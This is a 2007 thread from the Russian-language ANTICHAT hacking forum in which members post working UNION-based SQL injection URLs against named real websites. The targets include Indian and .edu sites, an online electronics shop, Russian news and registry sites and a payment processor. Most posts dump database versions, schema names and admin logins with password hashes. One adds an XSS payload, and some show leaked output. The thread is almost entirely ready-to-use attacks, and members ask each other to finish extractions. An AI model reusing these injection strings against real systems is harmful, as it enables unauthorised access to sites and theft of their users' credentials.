SQL Инъекции — ANTICHAT Forum

11.09.2007, 09:34

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

красивый сайт

Код:

http://www.femina.in/viewpost.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71 ),0x71),3, 4,5,6,7,8,9,10,11,12,13,14,15/*

а форум еще лучше =)

Код:

http://www.femina.in/viewpost.php?id=-1+union+select+1,concat(username,0x3a,user_password,0x3a,user_email,0x3a, user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15+ from+phpbb_users+limit+1,1/*

edu.in

11.09.2007, 09:59

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

edu.in

Код:

http://www.vedanta.edu.in/page.php?id=-2+union+select+ 1,2,concat( user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14/*

табличка и колонка:

Код:

htp://www.vedanta.edu.in/page.php?id=-2+union+select+1,2,3,4,5,6,concat(column_name,0x3a,table_ name, 0 x3a),8,9,10,11,12,13,14+from+ INFORMATION_SCHEMA.COLUMNS+ lim it+160,1/*

а вот сами логин + хэш =)

Код:

http://www.vedanta.edu.in /page.php?id=-2+union+ select+1,2,username,4,5,6,password,8, 9,10,11,12,13,14+from+ admin/*

11.09.2007, 14:59

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

везде 4 мускл...

Цитата:

_htp://dostoevskij .karelia.ru/showarticle.phtml?id=-1 +union+select+1,concat(user(), 0x3a,version( ),0x3a,database() )/*
_htp://www.passi.eu/profil.php?id= -1+union+s elect+1,2,3,4,5,6,7,8,9,10,11,12,concat(user (),0x3a ,version(),0x3a,database() ),14,15,16,17,18/*
_htp://www.aktivungdom.eu/art/?id=9999+union+ select+1,2,3,concat(user(),0x3a,version( ),0x3a,database() ),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27/*
_http://www .bsn.eu/main.php?id=-1+union+select+1,2,3,aes_decrypt (aes_encrypt(version(),0x 71),0x 71),5,6,7,8,9/*

14.09.2007, 17:55

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Код:

http://www.alalbany.ws/search/view.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*  albws_albws@localhost:4.1.22-standard:albws_albwsch

Код:

http://www.eitan.ws/publicaciones/ver_publicaciones.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database())/*  eitan@192.168.0.120:5.0.22-max:eitan

Интернет магазин цифровой техники

14.09.2007, 19:58

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Интернет магазин цифровой техники

Интернет магазин цифровой техники =\

Код:

htp://cyfra. com.ua/options?id= 9999+union+se lect+1,concat(user(),0x3a,version(),0x3a,database())/*

cyfra@localhost:5.0.24a-Debian_9-log:cyfra

11.09.2007, 20:13

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://www.ghost-bikes.com/2008/typ.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33/*

вывод в пути к картинке

Цитата:

http://www.rosregistr.ru/index.php?menu=3010050000&id_part=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21

инжекты во всех параметрах =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 11.09.2007 в 20:20..

12.09.2007, 00:23

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

.EDU

красивая скуля, код:
http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,CAST(concat(column_name,char(5 8),table_name)+AS+BINARY),4+from+information_schem a.columns/*

нашел только это, код:

http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,concat(username,password),4+fr om+admina/* кто доработает?

12.09.2007, 14:49

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

https://ssl.paycash.ua/cgi-bin/error.cgi?code=-300%20union%20select%20'Это%20в<script>alert(" XSS")</script>ывод'
Нашел вот такую скулю (впервые в cgi скрипте). Единственное что придумал это ХСС. Извесны таблицы errors и partners. Больше вытянуть ничего не удалось. А может и нету тут нифига. Кто найдет, расскажите

13.09.2007, 00:46

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

А такие скули стоит выкладывать?

код:

http://wap.sarbc.ru/news/shownews.phtml?id=-71891+union+select+1,2,3,4,concat(char(58),char(58 ),char(58),char(58),char(58),name,char(58),passwd) ,6,7,8,9,10,11,12+from+user+limit+1,1/*

p.s At me today birthday

Последний раз редактировалось fobofob; 13.09.2007 в 01:00.. Причина: .

#10

13.09.2007, 02:06

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

Код:

http://www.kraak.net/en/releases.php?ID=-31+union+select+1,2,3,4,concat(username,0x3a,userpassword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user/*